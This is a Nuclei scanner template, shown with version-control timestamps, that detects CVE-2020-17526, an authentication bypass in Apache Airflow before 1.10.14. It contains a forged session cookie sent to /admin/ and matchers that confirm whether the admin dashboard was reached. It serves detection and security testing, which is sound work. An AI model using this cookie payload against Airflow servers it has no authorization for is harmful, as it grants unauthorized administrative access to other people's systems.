2022-08-25 10:16:13 +00:00
id : CVE-2020-17526
info :
2022-08-25 13:46:09 +00:00
name : Apache Airflow < 1.10.14 - Authentication Bypass
2022-08-25 10:16:13 +00:00
author : piyushchhiroliya
severity : high
2022-08-25 13:46:09 +00:00
description : |
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
2022-08-25 10:16:13 +00:00
reference :
2022-08-25 13:46:09 +00:00
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
2022-08-25 10:16:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
classification :
cve-id : CVE-2020-17526
2022-08-25 13:46:09 +00:00
metadata :
verified : true
fofa-query : "Apache Airflow"
tags : cve,cve2020,apache,airflow,auth-bypass
2022-08-25 10:16:13 +00:00
requests :
- raw :
- |
GET /admin/ HTTP/1.1
Host : {{Hostname}}
2022-08-30 10:45:32 +00:00
- |
GET /admin/ HTTP/1.1
Host : {{Hostname}}
2022-08-25 10:16:13 +00:00
Cookie : session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
2022-08-30 10:45:32 +00:00
req-condition : true
2022-08-25 10:56:54 +00:00
matchers-condition : and
2022-08-25 10:16:13 +00:00
matchers :
- type : word
2022-08-30 10:45:32 +00:00
part : body_2
2022-08-25 10:16:13 +00:00
words :
- "DAG"
- "Recent Tasks"
- "Users"
- "SLA Misses"
- "Task Instances"
condition : and
2022-08-25 10:56:54 +00:00
2022-08-30 10:45:32 +00:00
- type : dsl
dsl :
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition : and